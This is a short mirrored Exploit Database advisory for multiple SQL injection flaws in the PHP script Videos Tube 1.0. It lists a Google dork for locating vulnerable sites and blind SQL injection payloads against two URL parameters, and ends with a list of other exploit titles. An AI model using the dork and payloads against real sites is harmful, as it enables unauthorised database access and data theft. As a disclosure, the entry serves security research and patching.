Videos Tube 1.0 – Multiple SQL Injections

Exploit Database
37 阅读

作者： Mustafa ALTINKAYNAK

日期： 2014-05-26
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/33514/

# Exploit Title: Videos Tube SQL Injection and Remote Code Execution
# Google Dork: inurl:"single.php?url=" video
# Date: 05.05.2014
# Exploit Author: Mustafa ALTINKAYNAK
# Vendor Homepage: http://www.phpscriptlerim.com
# Software Link: http://demo.phpscriptlerim.com/free/videostube/
# Version: 1.0

Description (Açıklama)
========================
Category, showing video on the page are two types of SQL injection. Boolean-based blind and AND / OR time-based blind. Incoming data can be filtered off light.

Vulnerability
========================
1) videocat.php?url=test' AND 3383=3383 AND 'ODau'='ODau (with SQLMAP Tool)
2) single.php?url=test' AND 3383=3383 AND 'ODau'='ODau (with SQLMap Tool)

last Exploits
Videos Tube 1.0 – Multiple SQL Injections的更多信息

PHP Mass Mail 1.0 – Arbitrary File Upload：
WordPress Plugin Count Per Day 3.5.4 – Persistent Cross-Site Scripting：
Complaint Management System 1.0 – ‘cid’ SQL Injection：
Ahsay Backup 7.x – 8.1.1.50 – Authenticated Arbitrary File Upload / Remote Code Execution (Metasploit)：
Mikrotik Router Monitoring System 1.2.3 – ‘community’ SQL Injection：
WordPress Plugin All In One WP Security 3.8.2 – SQL Injection：
SjXjV 2.3 – ‘post.php’ SQL Injection：
FlexAir Access Control 2.3.35 – Authentication Bypass：